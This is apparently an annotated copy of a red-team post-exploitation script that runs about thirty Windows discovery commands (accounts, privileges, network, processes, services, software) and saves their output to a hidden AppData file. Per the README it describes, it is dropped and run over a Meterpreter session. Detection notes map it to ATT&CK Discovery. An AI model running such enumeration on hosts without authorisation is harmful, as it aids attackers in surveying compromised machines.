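#Author : BehzaDMagzer
r"""Auto-PostXploit (source.py): scripted Windows host enumeration.

The repository listing holds three files: Auto-PostXploit.exe (a prebuilt
binary), README.md and this source.py.  The README titles the project
"Windows Auto Post Exploitation - For ReD Team" and credits
https://github.com/emilyanncr/Windows-Post-Exploitation/ as its reference.

What the script does
    It runs a fixed list of built-in Windows commands through ``os.popen``
    and appends each command's output, under a title line, to
    C:\Users\<user>\AppData\ginfo.txt.  As listed, every command is a
    query (firewall state, accounts, network configuration, processes,
    services, installed updates and software); the only thing the script
    itself writes is ginfo.txt.

How the README says it is used
    The compiled executable is uploaded into C:/Users/%USERNAME%/AppData
    over an existing Meterpreter session and started hidden; once the
    process is no longer running, ginfo.txt is downloaded from the same
    directory.

What an analyst can look for
    * ``os.popen`` runs each command through the system shell, so on
      Windows every entry should show up in process-creation telemetry as
      a shell child of one parent (python.exe or the packaged exe)
      - roughly thirty discovery commands in quick succession.
    * ginfo.txt, and per the README the executable itself, sitting directly
      in the user's AppData directory rather than under Local/Roaming.
    * The command set maps to the ATT&CK Discovery tactic (TA0007), e.g.
      T1082 System Information Discovery, T1087 Account Discovery,
      T1016 System Network Configuration Discovery, T1057 Process Discovery.
"""
import os

# The account name is resolved by shelling out to `echo %username%`; the
# trailing newline from echo is removed before the name is put in the path.
user_name = os.popen("echo %username%").read().replace('\n', '')

# Single output file; every command's result is appended to it.
path_ = "C:\\Users\\{}\\AppData\\ginfo.txt".format(user_name)


def oscommand(com, desk):
    """Run one shell command and append its titled output to ``path_``.

    Args:
        com: Command line passed to ``os.popen``.
        desk: Label written in the ``--=[ ... ]=--`` title line above the
            command's output.

    Only stdout is captured (that is what ``os.popen(...).read()`` returns),
    so a command that fails leaves just its title and blank lines in the
    report.
    """
    # NUL bytes are stripped from the captured text; presumably this is for
    # tools such as wmic that emit UTF-16 when piped - TODO confirm.
    res = os.popen(com).read().replace("\x00", '')
    res += "\n\n"
    title = "--=[ {} ]=--\n\n".format(desk)
    # Context manager so the handle is closed even if a write raises; the
    # original opened and closed the file by hand.
    with open(path_, 'a') as f:
        f.write(title)
        f.write(res)


# (command line, label) pairs, run in this order.  Labels are the author's
# and are written verbatim into ginfo.txt; a few do not match the command
# (e.g. `net start` with no arguments lists started services, not startup
# processes).
commmands = [
    ("netsh firewall show state", "state of firewall"),
    ("whoami /all", "user and privilege information"),
    ("net users", "list users"),
    ("net accounts", "net accounts"),
    ("gpresult /z", "user settings"),
    ("systeminfo", "system information"),
    ("ipconfig /all", "ip configuration information"),
    ("route print", "machines routing table"),
    ("ipconfig /displaydns", "display the contents of the DNS resolver cache "),
    ("arp -a", "ARP table"),
    ("nbtstat -n", "lists local NetBIOS names"),
    ("qwinsta /counter /vm", "information about remote desktop dervices sessions"),
    ("net share", "view shared resources on network"),
    ("fsutil fsinfo drives", "drives on system"),
    ("tasklist /M", "lists all tasks and dlls"),
    ("tasklist /V", "displays verbose task information"),
    ("netstat -ano", "to see what services are running on what ports"),
    ("netstat -r", "displays the routing table"),
    ("net config workstation", "information about the configuration of the workstation"),
    ("net start", "view list processes started upon startup"),
    ("sc query state=all", "enumerates all services & drivers"),
    ("wmic startup list full", "view list processes started upon startup(wmic)"),
    ("wmic bios", "show information about bios"),
    ("wmic qfe", "show information about updates"),
    ("wmic service", "show services"),
    ("wmic os", "show information about os"),
    ("wmic process get caption,executablepath", "show process"),
    ("wmic logicaldisk get name,freespace,systemname,filesystem,size,volumeserialnumber", "show information about logicaldisk"),
    ("wmic useraccount get /all", ""),
    ("wmic PRODUCT get name,version,installlocation", "show list programs installed"),
]

# Runs at import/execution time: one shell invocation and one append per entry.
for com, desk in commmands:
    oscommand(com, desk)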